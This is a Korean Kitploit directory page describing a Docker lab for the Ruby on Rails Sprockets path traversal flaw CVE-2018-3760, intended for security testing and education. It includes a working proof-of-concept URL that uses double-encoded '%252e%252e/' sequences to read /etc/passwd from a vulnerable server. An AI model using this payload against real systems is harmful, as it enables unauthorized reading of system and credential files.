Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/cyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityLearning & EducationLabs & Practice
GitHubcyberharsh/ruby-on-rails-path-traversal-vulnerability-cve-2018-3760-

Ruby-On-Rails-Path-Traversal-Vulnerability-CVE-2018-3760-

Docker 기반 랩으로, Ruby on Rails Sprockets의 CVE-2018-3760 경로 탐색(path traversal) 취약점을 시연하며, 보안 테스트 및 교육을 위한 POC와 환경 설정을 포함합니다.

저장소 보기
316년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Ruby On Rails 경로 탐색 취약점 (CVE-2018-3760)

중국어 버전(Chinese version)

Ruby On Rails는 잘 알려진 Ruby 웹 개발 프레임워크로, 개발 환경에서 Sprockets를 정적 파일 서버로 사용합니다. Sprockets는 정적 리소스 파일을 컴파일하고 배포하는 Ruby 라이브러리입니다.

Sprockets 3.7.1 이하 버전에는 이중 디코딩으로 인한 경로 탐색 취약점이 있습니다. 공격자는 %252e%252e/를 사용하여 루트 디렉토리에 접근하고 대상 서버의 모든 파일을 읽거나 실행할 수 있습니다.

참고 링크:

  • https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
  • https://seclists.org/oss-sec/2018/q2/210
  • https://xz.aliyun.com/t/2542

환경 설정

다음 명령어를 입력하세요:

root@kitploit:~
docker-compose up -d

http://your-ip:3000에 접속하면 환영 페이지가 표시됩니다.

POC

http://your-ip:3000/assets/file:%2f%2f/etc/passwd에 직접 접속하면 오류가 발생합니다. 파일이 허용된 디렉토리에 없기 때문입니다.

/etc/passwd

오류 페이지에서 허용된 디렉토리 목록을 확인할 수 있습니다. 그중 하나(예: /usr/src/blog/app/assets/images)를 선택한 다음 %252e%252e/를 사용하여 상위 디렉토리로 이동하고, 최종적으로 /etc/passwd 파일을 읽습니다:

root@kitploit:~
http://your-ip:3000/assets/file:%2f%2f/usr/src/blog/app/assets/images/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/etc/passwd

도구 다운로드